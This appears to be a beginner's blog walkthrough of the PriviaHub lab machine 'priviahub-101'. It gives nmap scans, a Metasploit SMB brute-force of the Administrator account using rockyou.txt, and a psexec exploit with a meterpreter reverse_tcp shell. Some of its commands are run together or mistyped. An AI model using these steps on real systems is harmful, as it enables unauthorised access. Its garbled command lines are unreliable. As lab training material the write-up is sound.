PriviaHub Walkthrough : priviahub-101
Welcome to my first article on medium. Today we will be looking at priviahub-101 from PriviaHub. I specifically chose this machine because it can be a good start for people who wants to be penetration testers.
Summary :
- There are two important open ports on machine 139 and 445.
- SMB on ports 139 (NetBios) and port 445
- Port 139: SMB originally ran on top of NetBIOS using port 139. NetBIOS is an older transport layer that allows Windows computers to talk to each other on the same network.
- Port 445: Later versions of SMB (after Windows 2000) began to use port 445 on top of a TCP stack. Using TCP allows SMB to work over the internet.
- It is requested to use the rockyou.txt file to attack the Administrator account through the SMB service to Brute-Force attack. Then exploit the machine using the Metasploit psexec module and capture the flags.
- Basic windows privilege escalation with shell command.
Let’s start with this machine.
The “priviahub-101” machine IP is 172.16.71.175
We are going to apply the usual methodology of penetration testing as we have applied before. Let’s start with enumeration learn as much about the machine as possible.
Enumaration
We are going to start with the nmap scan to gather more information about the services and version running on this machine.
nmap -T4 -A -p- 172.16.71.175
As we can see, ports 139 and 445 are open. If you ask what it means, it shows there is a smb port opening. Server Message Block (SMB) is an application layer (layer 7) protocol that is widely used for file, port, named pipe and printer sharing. It is a client-server communication protocol. Let’s do an nmap scan again:
nmap -A -p 445 172.16.71.175
SMB Brute-Force attack
We can use msfconsole to learn more information about this machine’s users. We are going to search smb login.
And now use a scanner module :
use auxiliary/scanner/smb/smb_login show options set rhosts : target ip set SMBuser Administrator set PASS_FILE /root/rockyou.txt
We used the rockyou.txt to learn the administrator password.
If you say where did you find “Administrator” . It’s was written in the machine info.
We found Administrator password.
Exploitation
We will use this information for metasploit psexec module.
User : “Administrator” Password : “111111”
And then the last step is psexec module.
We are going to search smb psexec.
And now use a scanner module:
use exploit/Windows/smb/psexecset payload windows/meterpreter/reverse_tcpshow optionsset rhosts target ipset SMBUser Administratorset SMBPass 11111set lhosts set tun0set rhosts 443set target 2exploit
We are inside the machine.
Privilege Escalation
And then we can write sysinfo to learn about this machine system info.
We can use Shell command for control through windows.
We enumerate to grab the root.txt and user.txt flags.
We found the user flag.
We found the Root flag.
And our last step here is getting the root flag.
Hope you guys enjoyed this tutorial, let me know if you try this out. Follow me for more projects like this!